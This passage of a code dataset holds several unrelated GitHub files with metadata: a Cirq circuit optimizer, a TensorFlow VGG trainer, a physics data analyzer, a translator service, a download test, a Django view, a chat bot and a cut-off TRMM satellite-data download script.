Dump the gates.\n _dump_held(op.qubits, moment_index, state)\n\n # Put anything that's still held at the end of the circuit.\n _dump_held(state.held_w_phases.keys(), len(circuit), state)\n\n circuit.batch_remove(state.deletions)\n circuit.batch_insert_into(state.inline_intos)\n circuit.batch_insert(state.insertions)\n\n\ndef _absorb_z_into_w(moment_index: int,\n op: ops.Operation,\n state: _OptimizerState) -> None:\n \"\"\"Absorbs a Z^t gate into a W(a) flip.\n\n [Where W(a) is shorthand for PhasedX(phase_exponent=a).]\n\n Uses the following identity:\n ───W(a)───Z^t───\n ≡ ───W(a)───────────Z^t/2──────────Z^t/2─── (split Z)\n ≡ ───W(a)───W(a)───Z^-t/2───W(a)───Z^t/2─── (flip Z)\n ≡ ───W(a)───W(a)──────────W(a+t/2)───────── (phase W)\n ≡ ────────────────────────W(a+t/2)───────── (cancel Ws)\n ≡ ───W(a+t/2)───\n \"\"\"\n t = cast(value.TParamVal, _try_get_known_z_half_turns(op))\n q = op.qubits[0]\n state.held_w_phases[q] += t / 2\n state.deletions.append((moment_index, op))\n\n\ndef _dump_held(qubits: Iterable[ops.Qid],\n moment_index: int,\n state: _OptimizerState):\n # Note: sorting is to avoid non-determinism in the insertion order.\n for q in sorted(qubits):\n p = state.held_w_phases.get(q)\n if p is not None:\n dump_op = ops.PhasedXPowGate(phase_exponent=p).on(q)\n state.insertions.append((moment_index, dump_op))\n state.held_w_phases.pop(q, None)\n\n\ndef _dump_into_measurement(moment_index: int,\n op: ops.Operation,\n state: _OptimizerState) -> None:\n measurement = cast(ops.MeasurementGate, cast(ops.GateOperation, op).gate)\n new_measurement = measurement.with_bits_flipped(\n *[i for i, q in enumerate(op.qubits) if q in state.held_w_phases]).on(\n *op.qubits)\n for q in op.qubits:\n state.held_w_phases.pop(q, None)\n state.deletions.append((moment_index, op))\n state.inline_intos.append((moment_index, new_measurement))\n\n\ndef _potential_cross_whole_w(moment_index: int,\n op: ops.Operation,\n tolerance: float,\n state: _OptimizerState) -> None:\n \"\"\"Grabs or cancels a held W gate against an existing W gate.\n\n [Where W(a) is shorthand for PhasedX(phase_exponent=a).]\n\n Uses the following identity:\n ───W(a)───W(b)───\n ≡ ───Z^-a───X───Z^a───Z^-b───X───Z^b───\n ≡ ───Z^-a───Z^-a───Z^b───X───X───Z^b───\n ≡ ───Z^-a───Z^-a───Z^b───Z^b───\n ≡ ───Z^2(b-a)───\n \"\"\"\n state.deletions.append((moment_index, op))\n\n _, phase_exponent = cast(Tuple[value.TParamVal, value.TParamVal],\n _try_get_known_phased_pauli(op))\n q = op.qubits[0]\n a = state.held_w_phases.get(q, None)\n b = phase_exponent\n\n if a is None:\n # Collect the gate.\n state.held_w_phases[q] = b\n else:\n # Cancel the gate.\n del state.held_w_phases[q]\n t = 2*(b - a)\n if not decompositions.is_negligible_turn(t / 2, tolerance):\n leftover_phase = ops.Z(q)**t\n state.inline_intos.append((moment_index, leftover_phase))\n\n\ndef _potential_cross_partial_w(moment_index: int,\n op: ops.Operation,\n state: _OptimizerState) -> None:\n \"\"\"Cross the held W over a partial W gate.\n\n [Where W(a) is shorthand for PhasedX(phase_exponent=a).]\n\n Uses the following identity:\n ───W(a)───W(b)^t───\n ≡ ───Z^-a───X───Z^a───W(b)^t────── (expand W(a))\n ≡ ───Z^-a───X───W(b-a)^t───Z^a──── (move Z^a across, phasing axis)\n ≡ ───Z^-a───W(a-b)^t───X───Z^a──── (move X across, negating axis angle)\n ≡ ───W(2a-b)^t───Z^-a───X───Z^a─── (move Z^-a across, phasing axis)\n ≡ ───W(2a-b)^t───W(a)───\n \"\"\"\n a = state.held_w_phases.get(op.qubits[0], None)\n if a is None:\n return\n exponent, phase_exponent = cast(Tuple[value.TParamVal, 
value.TParamVal],\n _try_get_known_phased_pauli(op))\n new_op = ops.PhasedXPowGate(\n exponent=exponent,\n phase_exponent=2 * a - phase_exponent).on(op.qubits[0])\n state.deletions.append((moment_index, op))\n state.inline_intos.append((moment_index, new_op))\n\n\ndef _single_cross_over_cz(moment_index: int, op: ops.Operation,\n qubit_with_w: 'cirq.Qid',\n state: _OptimizerState) -> None:\n \"\"\"Crosses exactly one W flip over a partial CZ.\n\n [Where W(a) is shorthand for PhasedX(phase_exponent=a).]\n\n Uses the following identity:\n\n ──────────@─────\n │\n ───W(a)───@^t───\n\n\n ≡ ───@──────O──────@────────────────────\n | | │ (split into on/off cases)\n ───W(a)───W(a)───@^t──────────────────\n\n ≡ ───@─────────────@─────────────O──────\n | │ | (off doesn't interact with on)\n ───W(a)──────────@^t───────────W(a)───\n\n ≡ ───────────Z^t───@──────@──────O──────\n │ | | (crossing causes kickback)\n ─────────────────@^-t───W(a)───W(a)─── (X Z^t X Z^-t = exp(pi t) I)\n\n ≡ ───────────Z^t───@────────────────────\n │ (merge on/off cases)\n ─────────────────@^-t───W(a)──────────\n\n ≡ ───Z^t───@──────────────\n │\n ─────────@^-t───W(a)────\n \"\"\"\n t = cast(value.TParamVal, _try_get_known_cz_half_turns(op))\n other_qubit = op.qubits[0] if qubit_with_w == op.qubits[1] else op.qubits[1]\n negated_cz = ops.CZ(*op.qubits)**-t\n kickback = ops.Z(other_qubit)**t\n\n state.deletions.append((moment_index, op))\n state.inline_intos.append((moment_index, negated_cz))\n state.insertions.append((moment_index, kickback))\n\n\ndef _double_cross_over_cz(op: ops.Operation,\n state: _OptimizerState) -> None:\n \"\"\"Crosses two W flips over a partial CZ.\n\n [Where W(a) is shorthand for PhasedX(phase_exponent=a).]\n\n Uses the following identity:\n\n ───W(a)───@─────\n │\n ───W(b)───@^t───\n\n\n ≡ ──────────@────────────W(a)───\n │ (single-cross top W over CZ)\n ───W(b)───@^-t─────────Z^t────\n\n\n ≡ ──────────@─────Z^-t───W(a)───\n │ (single-cross bottom W over CZ)\n ──────────@^t───W(b)───Z^t────\n\n\n ≡ ──────────@─────W(a)───Z^t────\n │ (flip over Z^-t)\n ──────────@^t───W(b)───Z^t────\n\n\n ≡ ──────────@─────W(a+t/2)────���─\n │ (absorb Zs into Ws)\n ──────────@^t───W(b+t/2)──────\n\n ≡ ───@─────W(a+t/2)───\n │\n ───@^t───W(b+t/2)───\n \"\"\"\n t = cast(value.TParamVal, _try_get_known_cz_half_turns(op))\n for q in op.qubits:\n state.held_w_phases[q] = cast(value.TParamVal,\n state.held_w_phases[q]) + t / 2\n\n\ndef _try_get_known_cz_half_turns(op: ops.Operation, no_symbolic: bool = False\n ) -> Optional[value.TParamVal]:\n if (not isinstance(op, ops.GateOperation) or\n not isinstance(op.gate, ops.CZPowGate)):\n return None\n h = op.gate.exponent\n if no_symbolic and isinstance(h, sympy.Basic):\n return None\n return h\n\n\ndef _try_get_known_phased_pauli(\n op: ops.Operation, no_symbolic: bool = False\n) -> Optional[Tuple[value.TParamVal, value.TParamVal]]:\n if ((no_symbolic and protocols.is_parameterized(op)) or\n not isinstance(op, ops.GateOperation)):\n return None\n gate = op.gate\n\n if isinstance(gate, ops.PhasedXPowGate):\n e = gate.exponent\n p = gate.phase_exponent\n elif isinstance(gate, ops.YPowGate):\n e = gate.exponent\n p = 0.5\n elif isinstance(gate, ops.XPowGate):\n e = gate.exponent\n p = 0.0\n else:\n return None\n return value.canonicalize_half_turns(e), value.canonicalize_half_turns(p)\n\n\ndef _try_get_known_z_half_turns(op: ops.Operation, no_symbolic: bool = False\n ) -> Optional[value.TParamVal]:\n if (not isinstance(op, ops.GateOperation) or\n not isinstance(op.gate, 
ops.ZPowGate)):\n return None\n h = op.gate.exponent\n if no_symbolic and isinstance(h, sympy.Basic):\n return None\n return h\n","repo_name":"OscarJHernandez/qc_portfolio_optimization","sub_path":"venv/lib/python3.8/site-packages/cirq/optimizers/eject_phased_paulis.py","file_name":"eject_phased_paulis.py","file_ext":"py","file_size_in_byte":14214,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"61"}
+{"seq_id":"72321118273","text":"import tensorflow as tf\r\nimport numpy as np\r\nimport TFRecord\r\n\r\n# 定义网络参数\r\nlearning_rate = 0.001\r\ndisplay_step = 5\r\nepochs = 10\r\nkeep_prob = 0.5\r\n\r\n\r\ndef conv_op(input_op, name, kh, kw, n_out, dh, dw, par):\r\n input_op = tf.convert_to_tensor(input_op)\r\n n_in = input_op.get_shape()[-1].value\r\n with tf.name_scope(name) as scope:\r\n kernel = tf.get_variable(scope + \"w\",\r\n shape=[kh, kw, n_in, n_out],\r\n dtype=tf.float32,\r\n initializer=tf.contrib.layers.xavier_initializer_conv2d())\r\n conv = tf.nn.conv2d(input_op, kernel, (1, dh, dw, 1), padding='SAME')\r\n bias_init_val = tf.constant(0.0, shape=[n_out], dtype=tf.float32)\r\n biases = tf.Variable(bias_init_val, trainable=True, name='b')\r\n z = tf.nn.bias_add(conv, biases)\r\n activation = tf.nn.relu(z, name=scope)\r\n par += [kernel, biases]\r\n return activation\r\n\r\n\r\n# 定义全连接操作\r\n\r\n\r\ndef fc_op(input_op, name, n_out, par):\r\n n_in = input_op.get_shape()[-1].value\r\n with tf.name_scope(name) as scope:\r\n kernel = tf.get_variable(scope + 'w',\r\n shape=[n_in, n_out],\r\n dtype=tf.float32,\r\n initializer=tf.contrib.layers.xavier_initializer())\r\n biases = tf.Variable(tf.constant(0.1, shape=[n_out], dtype=tf.float32), name='b')\r\n # tf.nn.relu_layer对输入变量input_op与kernel做矩阵乘法加上bias,再做RELU非线性变换得到activation\r\n activation = tf.nn.relu_layer(input_op, kernel, biases, name=scope)\r\n par += [kernel, biases]\r\n return activation\r\n\r\n\r\n# 定义池化层\r\ndef mpool_op(input_op, name, kh, kw, dh, dw):\r\n return tf.nn.max_pool(input_op,\r\n ksize=[1, kh, kw, 1],\r\n strides=[1, dh, dw, 1],\r\n padding='SAME',\r\n name=name)\r\n\r\n\r\n# net\r\ndef inference_op(input_op, keep_prob):\r\n p = []\r\n # block 1 -- outputs 112x112x64\r\n conv1_1 = conv_op(input_op, name=\"conv1_1\", kh=3, kw=3, n_out=64, dh=1, dw=1, par=p)\r\n conv1_2 = conv_op(conv1_1, name=\"conv1_2\", kh=3, kw=3, n_out=64, dh=1, dw=1, par=p)\r\n pool1 = mpool_op(conv1_2, name=\"pool1\", kh=2, kw=2, dw=2, dh=2)\r\n\r\n # block 2 -- outputs 56x56x128\r\n conv2_1 = conv_op(pool1, name=\"conv2_1\", kh=3, kw=3, n_out=128, dh=1, dw=1, par=p)\r\n conv2_2 = conv_op(conv2_1, name=\"conv2_2\", kh=3, kw=3, n_out=128, dh=1, dw=1, par=p)\r\n pool2 = mpool_op(conv2_2, name=\"pool2\", kh=2, kw=2, dh=2, dw=2)\r\n\r\n # # block 3 -- outputs 28x28x256\r\n conv3_1 = conv_op(pool2, name=\"conv3_1\", kh=3, kw=3, n_out=256, dh=1, dw=1, par=p)\r\n conv3_2 = conv_op(conv3_1, name=\"conv3_2\", kh=3, kw=3, n_out=256, dh=1, dw=1, par=p)\r\n conv3_3 = conv_op(conv3_2, name=\"conv3_3\", kh=3, kw=3, n_out=256, dh=1, dw=1, par=p)\r\n pool3 = mpool_op(conv3_3, name=\"pool3\", kh=2, kw=2, dh=2, dw=2)\r\n\r\n # block 4 -- outputs 14x14x512\r\n conv4_1 = conv_op(pool3, name=\"conv4_1\", kh=3, kw=3, n_out=512, dh=1, dw=1, par=p)\r\n conv4_2 = conv_op(conv4_1, name=\"conv4_2\", kh=3, kw=3, n_out=512, dh=1, dw=1, par=p)\r\n conv4_3 = conv_op(conv4_2, name=\"conv4_3\", kh=3, kw=3, n_out=512, dh=1, dw=1, par=p)\r\n pool4 = mpool_op(conv4_3, name=\"pool4\", kh=2, kw=2, dh=2, dw=2)\r\n\r\n # block 5 -- outputs 7x7x512\r\n conv5_1 = conv_op(pool4, name=\"conv5_1\", kh=3, kw=3, n_out=512, dh=1, dw=1, par=p)\r\n conv5_2 = conv_op(conv5_1, name=\"conv5_2\", kh=3, kw=3, n_out=512, dh=1, dw=1, par=p)\r\n conv5_3 = conv_op(conv5_2, name=\"conv5_3\", kh=3, kw=3, n_out=512, dh=1, dw=1, par=p)\r\n pool5 = mpool_op(conv5_3, name=\"pool5\", kh=2, kw=2, dw=2, dh=2)\r\n\r\n # flatten\r\n shp = pool5.get_shape()\r\n flattened_shape = shp[1].value * shp[2].value * 
shp[3].value\r\n resh1 = tf.reshape(pool5, [-1, flattened_shape], name=\"resh1\")\r\n\r\n # fully connected\r\n fc6 = fc_op(resh1, name=\"fc6\", n_out=4096, par=p)\r\n fc6_drop = tf.nn.dropout(fc6, keep_prob, name=\"fc6_drop\")\r\n\r\n fc7 = fc_op(fc6_drop, name=\"fc7\", n_out=4096, par=p)\r\n fc7_drop = tf.nn.dropout(fc7, keep_prob, name=\"fc7_drop\")\r\n\r\n logits = fc_op(fc7_drop, name=\"fc8\", n_out=2, par=p)\r\n return logits\r\n\r\n\r\ndef train(logits, labels):\r\n cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=labels))\r\n\r\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)\r\n\r\n correct_pred = tf.equal(tf.argmax(logits, 1), tf.argmax(labels, 1))\r\n accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\r\n return optimizer, cost, accuracy\r\n\r\n\r\nif __name__ == \"__main__\":\r\n train_filename = \"/home/wc/DataSet/traffic/testTFRecord/train.tfrecords\"\r\n test_filename = \"/home/wc/DataSet/traffic/testTFRecord/test.tfrecords\"\r\n image_batch, label_batch = TFRecord.createBatch(filename=train_filename, batchsize=2)\r\n test_image, test_label = TFRecord.createBatch(filename=test_filename, batchsize=20)\r\n pred = inference_op(input_op=image_batch, keep_prob=keep_prob)\r\n test_pred = inference_op(input_op=test_image, keep_prob=keep_prob)\r\n optimizer, cost, accuracy = train(logits=pred, labels=label_batch)\r\n test_optimizer, test_cost, test_acc = train(logits=test_pred, labels=test_label)\r\n initop = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())\r\n with tf.Session() as sess:\r\n sess.run(initop)\r\n coord = tf.train.Coordinator()\r\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\r\n step = 0\r\n while step < epochs:\r\n step += 1\r\n print(step)\r\n _, loss, acc = sess.run([optimizer, cost, accuracy])\r\n if step % display_step == 0:\r\n print(loss, acc)\r\n print(\"training finish!\")\r\n _, testLoss, testAcc = sess.run([test_optimizer, test_cost, test_acc])\r\n print(\"Test acc = \" + str(testAcc))\r\n print(\"Test Finish!\")\r\n","repo_name":"xiaofengShi/Learning_resource","sub_path":"TF/黄文坚-TF实战/My_text/VGG/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6053,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"61"}
+{"seq_id":"74442855234","text":"import numpy as np\nimport scipy\nimport scipy.stats as st\nimport scipy.optimize as opt\nimport matplotlib.pyplot as plt \n\nimport cpt_tools\n\n\nclass CPTanalyzer( object ) :\n\n def __init__( self ) :\n\n self.num_data = 0 \n\n self.Z = 0\n self.A = 0\n self.N = 0\n\n self.ame_mass = 0\n self.ame_freq = 0\n \n self.current_mass_estimate = np.nan\n self.current_freq_estimate = np.nan\n \n self.data_list = [] \n\n self.min_timestamp = np.nan\n\n # don't use numpy arrays for increased efficiency in deleting entries in the middle\n self.radii = []\n self.angles = []\n self.taccs = [] \n self.timestamps = []\n\n # references are defined to have a tacc of 0.\n self.reference_mask = [] \n \n self.f, self.axarr = plt.subplots( 3 ) \n self.f.subplots_adjust( hspace = 0.8 )\n\n self.ref_drift_plot = self.axarr[0]\n self.radius_plot = self.axarr[1]\n self.residual_plot = self.axarr[2] \n\n self.active_data_idx = None\n \n \n def delete_index( self, idx ) :\n\n del self.data_list[ idx ] \n del self.radii[ idx ]\n del self.angles[ idx ]\n del self.taccs[ idx ]\n del self.timestamps[ idx ]\n del self.reference_mask[ idx ]\n\n self.num_data -= 1 \n # try : \n # self.reference_mask.remove( idx ) \n # except :\n # pass\n\n # def compute_reference_indices( self ) :\n # self.reference_indices = np.where( \n\n \n \n # apply fits and update plots \n def append( self, cpt_data ) :\n\n self.data_list.append( cpt_data )\n self.radii.append( np.nan )\n self.angles.append( np.nan )\n self.timestamps.append( cpt_data.timestamp )\n \n tacc = cpt_data.tabor_params.tacc\n self.taccs.append( tacc ) \n\n if tacc == 0 :\n self.reference_mask.append( 1 )\n else :\n self.reference_mask.append( 0 ) \n \n self.num_data += 1 \n # self.update() \n \n # def set_active_fit( self, params, errors, i ) :\n \n \n \n \n # def apply_fit( self, i, bounds ) :\n \n \n # if cpt_data.tacc == 0 :\n # self.reference_timestamps.append( cpt_data.timestamp )\n # # self.reference_radii.append( cpt_data.fit[0][1] )\n # # self.reference_\n\n # else :\n # self.timestamps.append( cpt_data.timestamp )\n \n \n # self.update() \n # pass \n\n\n # def update_min_timestamp( self ) :\n # self.min_timestamp = np.inf\n\n # if self.timestamps :\n # self.min_timestamp = min( self.min_timestamp, min( self.timestamps ) )\n\n # if self.reference_timestamps :\n # self.min_timestamp = min( self.min_timestamp, min( self.reference_timestamps ) )\n \n \n def update_ref_drift_plot( self ) :\n\n self.ref_drift_plot.clear()\n self.ref_drift_plot.set_xlabel( 'Relative Timestamp' )\n self.ref_drift_plot.set_ylabel( 'Absolute Angle' )\n self.ref_drift_plot.set_title( 'Reference Drift' )\n\n if np.sum( self.reference_mask ) == 0 :\n return \n \n references = np.array( self.reference_mask, dtype = bool ) \n \n ref_phase = np.array( self.angles )[ references ]\n ref_timestamps = np.array( self.timestamps )[ references ]\n ref_timestamps -= min( ref_timestamps )\n\n # print( 'plotting ref_drift_plot' )\n # print( self.reference_mask ) \n # print( ref_timestamps )\n # print( ref_phase ) \n\n self.ref_drift_plot.scatter( ref_timestamps, ref_phase, s = 1, c = 'r',\n zorder = 2 ) \n \n # if len( self.reference_timestamps ) < 0 :\n # return\n \n # min_timestamp = min( self.reference_timestamps ) \n # self.references\n\n\n def update_radius_plot( self ) : \n self.radius_plot.clear()\n self.radius_plot.set_xlabel( 'Accumulation Time' )\n self.radius_plot.set_ylabel( 'Radius' )\n self.radius_plot.set_title( 'Radius vs. 
Accumulation Time' ) \n\n if self.num_data == 0 :\n return\n \n # print( 'plotting radii' ) \n # print( self.taccs )\n # print( self.radii ) \n\n self.radius_plot.scatter( self.taccs, self.radii, s = 1, zorder = 2 ) \n\n \n def update_residual_plot( self ) :\n self.residual_plot.clear()\n self.residual_plot.set_xlabel( 'Accumulation Time' )\n self.residual_plot.set_ylabel( 'Residual' ) \n self.residual_plot.set_title( 'Mass Fit Residuals' ) \n \n \n def update( self ) :\n\n self.update_ref_drift_plot()\n self.update_radius_plot()\n self.update_residual_plot() \n # self.update_mass_estimate()\n \n\n def set_ion_params( self, Z, A, Q ) :\n self.Z = Z\n self.A = A\n self.q = Q\n self.N = A - Z\n self.ame_mass = cpt_tools.nuclear_data.masses[ self.Z, self.N ]\n self.ame_freq = cpt_tools.mass_to_omega( self.ame_mass, self.q, atomic_mass = 1 ) \n\n\n # def compute_ame_phase_estimate( self, tacc, ref_angle ) :\n\n # return \n\n \n\n # compute new mass estimate using all the aggregated data.\n def update_mass_estimate( self ) :\n\n reference_mask = np.array( self.reference_mask, dtype = bool ) & ( ~ np.isnan( self.angles ) )\n non_reference_mask = ( ~ reference_mask ) & ( ~ np.isnan( self.angles ) )\n\n # print( reference_mask )\n # print( non_reference_mask )\n # print( self.timestamps ) \n\n reference_indices = np.where( reference_mask == 1 )[0] \n non_reference_indices = np.where( non_reference_mask == 1 )[0]\n\n print( reference_indices )\n print( non_reference_indices )\n \n if np.sum( reference_mask ) == 0 or np.sum( non_reference_mask ) == 0 :\n self.current_mass_estimate = np.nan\n self.current_freq_estimate = np.nan\n return \n\n #\n # print( self.timestamps.shape )\n # print( self.reference_mask.shape ) \n \n reference_timestamps = np.array( self.timestamps )[ reference_mask ] \n \n num_non_references = len( non_reference_indices )\n measured_phases = np.zeros( num_non_references ) \n \n \n for i in range( num_non_references ) :\n\n #find closest reference\n idx = non_reference_indices[i] # index in self.timestamps \n timestamp = self.timestamps[ idx ]\n rel_ref_idx = np.argmin( np.abs( reference_timestamps - timestamp ) ) # index in reference_timestamps\n ref_idx = reference_indices[ rel_ref_idx ] \n\n phase = self.angles[ idx ] - self.angles[ ref_idx ]\n measured_phases[i] = phase \n\n taccs = np.array( self.taccs )[ non_reference_mask ]\n\n # return \n ret = scipy.optimize.leastsq( freq_estimate_resid, [ self.ame_freq ],\n args = ( taccs, measured_phases ), full_output = 1 )\n \n print( ret ) \n \n \n \nclass GaussianFit( object ) :\n\n def __init__( self, bounds, params, params_errors, redchisqr ) : \n self.bounds = bounds\n self.params = params\n self.params_errors = params_errors\n self.redchisqr = redchisqr \n \n \n\n \ndef gaussian( params, x ) :\n return params[0] * np.exp( - ( x - params[1] ) ** 2\n / ( 2 * params[2] ** 2 ) )\n\n\ndef normalized_gaussian( mu, sigma, x ) :\n sigma_sqr = sigma ** 2 \n return ( ( 1 / np.sqrt( 2 * np.pi * sigma_sqr ) )\n * np.exp( - ( x - mu ) ** 2\n / ( 2 * sigma ** 2 ) ) )\n\n \ndef _resid( params, func, x, y, dy ) :\n return ( y - func( params, x ) ) / dy \n\n\ndef fit_gaussian( x, y, bounds ) :\n print( 'called fit_gaussian' ) \n \n indices = ( x >= bounds[0] ) & ( x <= bounds[1] )\n\n x_cut = x[ indices ]\n y_cut = y[ indices ]\n\n if len( x_cut ) == 0 :\n print( 'WARNING: no data available in the specified bounds...' 
)\n return None\n\n dy_cut = np.sqrt( y_cut )\n dy_cut[ dy_cut == 0 ] = 1\n \n # print( y_cut ) \n \n max_idx = np.argmax( y_cut )\n mu_guess = float( x_cut[ max_idx ] )# + bounds[0]\n A_guess = float( y_cut[ max_idx ] )\n sigma_guess = 4.0\n\n params_guess = np.array( [ A_guess, mu_guess, sigma_guess ] )\n\n # print( 'params_guess: ', params_guess )\n \n ret = scipy.optimize.leastsq( _resid, params_guess, full_output = 1,\n args = ( gaussian, x_cut, y_cut, dy_cut ) )\n\n params, cov, info, mesg, success = ret\n params[2] = np.abs( params[2] ) \n \n\n if success > 0 :\n\n dof = len( x_cut ) - len( params )\n print( x_cut )\n print( params ) \n print( 'dof: ', dof ) \n \n redchisqr = ( np.sum( _resid( params, gaussian, x_cut, y_cut, dy_cut ) ) ** 2\n / dof ) \n \n if cov is not None :\n params_errors = np.sqrt( redchisqr * np.diag( cov ) )\n else :\n params_errors = None\n \n return GaussianFit( bounds, params, params_errors, redchisqr ) # pvalue\n\n else :\n print( 'WARNING: fit failed...' )\n return None\n \n \n \n\ndef freq_estimate_resid( frequency, taccs, phases ) :\n \n phase_predictions = cpt_tools.freq_to_phase( frequency, taccs )\n print( taccs ) \n print( phases )\n print( phase_predictions ) \n ret = phases - phase_predictions\n print( ret )\n return ret \n \n","repo_name":"jacobpierce1/cpt_tools","sub_path":"gui_controller/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":9801,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"20169936253","text":"from core.domain.word import Word\nfrom core.domain.translation_result import TranslationResult\nfrom typing import List, Optional\nfrom adapter.translator.translator_adapter import TranslatorAdapter\nfrom presenter.presenter import Presenter\nfrom adapter.spellchecker.spell_checker import correct_word_spelling\nfrom adapter.persister.data_persister import DataPersister\n\n\nclass TranslatorService():\n def __init__(self, translator_adapter: TranslatorAdapter, presenter: Presenter, storage: DataPersister):\n self.translator_adapter = translator_adapter\n self.presenter = presenter\n self.storage = storage\n self.input_languages = [\"English\"]\n self.output_languages = [\"Georgian\"]\n\n def translate_word(self, input_word: Word, target_languages: List[str], minimalistic=False) -> None:\n word, corrected_word = correct_word_spelling(input_word.word)\n if word != corrected_word:\n input_word.word = corrected_word\n self.presenter.present_text(f\"### Spelling of: '{input_word.word}' is not correct. Autocorrecting it \"\n f\"to: '{corrected_word}' ###\")\n try:\n if not input_word:\n return\n result: List[TranslationResult] = []\n for language in target_languages:\n if language.lower() == \"georgian\":\n storage_result: Optional[Word] = self.storage.search(input_word, language)\n if storage_result:\n result.append(TranslationResult(input_word, [storage_result]))\n else:\n translator_result = self.translator_adapter.get_georgian_translations_of_word(input_word.word)\n self.storage.put(input_word, translator_result.output_words[0])\n result.append(translator_result)\n self.presenter.present_translations(result[0].input_word, result[0].output_words if not minimalistic else [result[0].output_words[0]])\n except:\n print('Encountered problem with translating input word')\n\n def get_possible_input_languages(self) -> List[str]:\n return self.input_languages\n\n def get_possible_output_languages(self) -> List[str]:\n return self.output_languages\n","repo_name":"nikasakandelidze/translator-cli","sub_path":"src/core/service/translate_service.py","file_name":"translate_service.py","file_ext":"py","file_size_in_byte":2300,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"22639671113","text":"import json\nimport os\nimport tempfile\nfrom pathlib import Path\n\nimport flutes\n\n\ndef test_download() -> None:\n urls = [\n (\"https://drive.google.com/file/d/1bUShb-0taoXGDveut1B31UqzR-M7fEwA/view?usp=sharing\", \"demo.txt\"),\n (\"https://github.com/Somefive/MercuryJson/raw/master/data/numbers-small.json\", \"numbers-small.json\"),\n ]\n\n with tempfile.TemporaryDirectory() as tempdir:\n paths = []\n for url, filename in urls:\n path = Path(flutes.download(url, save_dir=tempdir, filename=filename))\n assert path.name == filename\n assert path.parent == Path(tempdir)\n paths.append(path)\n\n with paths[0].open() as f:\n assert f.read().strip() == \"This is a demo file from Google Drive.\"\n\n with paths[1].open() as f:\n assert all(isinstance(x, float) for x in json.load(f))\n\n for url, filename in urls[1:]:\n download_path = Path(tempfile.gettempdir()) / filename\n if download_path.exists():\n download_path.unlink()\n assert flutes.download(url, progress=True) == str(download_path)\n","repo_name":"huzecong/flutes","sub_path":"tests/test_network.py","file_name":"test_network.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"61"}
+{"seq_id":"3032686073","text":"import shelve\nfrom pathlib import Path\n\nfrom django.shortcuts import render\n\n\n# Create your views here.\ndef index(request):\n current_sdb_dir = Path(Path.home(), 'sdb')\n topic_slug = 'micropython-esp32'\n title = 'why-emp'\n with shelve.open(str(Path(current_sdb_dir, topic_slug + '.sdb')), flag='r') as db:\n context = db[title]\n return render(request, 'main.html', context)\n","repo_name":"JOHY119/django_jinjia","sub_path":"wiki/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"3629368488","text":"print(\"Title of program: Panda Bot\")\nprint()\nwhile True:\n description = input(\"How do you feel in a sentence, don't need serious, take it as a casual chat!\")\n\n list_of_words = description.split()\n\n feelings_list = []\n encouragement_list = []\n counter = 0\n \n for each_word in list_of_words:\n \n if each_word == \"bored\":\n feelings_list.append(\"bored\")\n encouragement_list.append(\"tomorrow will be a better day\")\n counter += 1\n if each_word == \"happy\":\n feelings_list.append(\"happy\")\n encouragement_list.append(\"to keep smiling\")\n counter += 1\n if each_word == \"tired\":\n feelings_list.append(\"tired\")\n encouragement_list.append(\"go to sleep\")\n counter += 1\n\n if counter == 0:\n \n output = \"Sorry I don't really understand. Please explain more words?\"\n\n elif counter == 1:\n \n output = \"It seems that you are feeling quite \" + feelings_list[0] + \". However, do remember that \"+ encouragement_list[0] + \"! Hope you feel better :)\" \n\n else:\n\n feelings = \"\" \n for i in range(len(feelings_list)-1):\n feelings += feelings_list[i] + \", \"\n feelings += \"and \" + feelings_list[-1]\n \n encouragement = \"\" \n for j in range(len(encouragement_list)-1):\n encouragement += encouragement_list[i] + \", \"\n encouragement += \"and \" + encouragement_list[-1]\n\n output = \" you are feeling quite \" + feelings + \",arent you Please always remember \"+ encouragement + \"! Hope you feel better,king! :)\"\n\n print()\n print(output)\n print()\n","repo_name":"SiyuanSY/Panda_bot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"1564849912","text":"__author__ = ['jwely']\n\n# import modules\nfrom download_url import download_url\nfrom list_ftp import list_ftp\nfrom datetime import datetime, timedelta\nimport os\nimport gzip\n\n__all__ = [\"fetch_TRMM\"]\n\n\ndef fetch_TRMM(start_dto, end_dto, outdir, product_string):\n \"\"\"\n Fetches TRMM data from an FTP server.\n\n ftp://trmmopen.gsfc.nasa.gov/trmmdata/ByDate/V07/\n\n :param start_dto: datetime object for start date of desired range\n :param end_dto: datetime object for end date of desired range\n :param outdir: output directory where files should be saved (str)\n :param product_string: the string for the desired product, options include\n 1B11, 1B21, 1CTMI, 2A12, 2A21, 2A23, 2A25, 2B31, 3B42,\n 3G25, 3G31. The usual precip product of interest is the\n well known 3B42 data product.\n\n :param output_files: a list of new filepaths created by this function\n \"\"\"\n\n # set up empty structure\n dates = []\n output_files = []\n ftpsite = \"ftp://pps.gsfc.nasa.gov\"\n un = \"develop.programming14@gmail.com\"\n\n date_delta = end_dto - start_dto\n\n for i in range(date_delta.days +1):\n dates.append(start_dto + timedelta(days = i))\n\n for date in dates:\n\n # navigate to path of desired year/month/day\n workdir = '/'.join(['trmmdata','ByDate','V07',\n str(date.year),\n str(date.month).zfill(2),\n str(date.day).zfill(2)])\n\n filenames, filepaths = list_ftp(site = ftpsite,\n dir = workdir,\n username = un,\n password = un)\n\n for filename in filenames:\n\n if product_string in filename:\n try:\n outname = os.path.join(outdir, os.path.basename(filename))\n download_url(ftpsite + filename, outname, username = un, password = un)\n output_files.append(outname)\n\n # now extract it out of its GZ 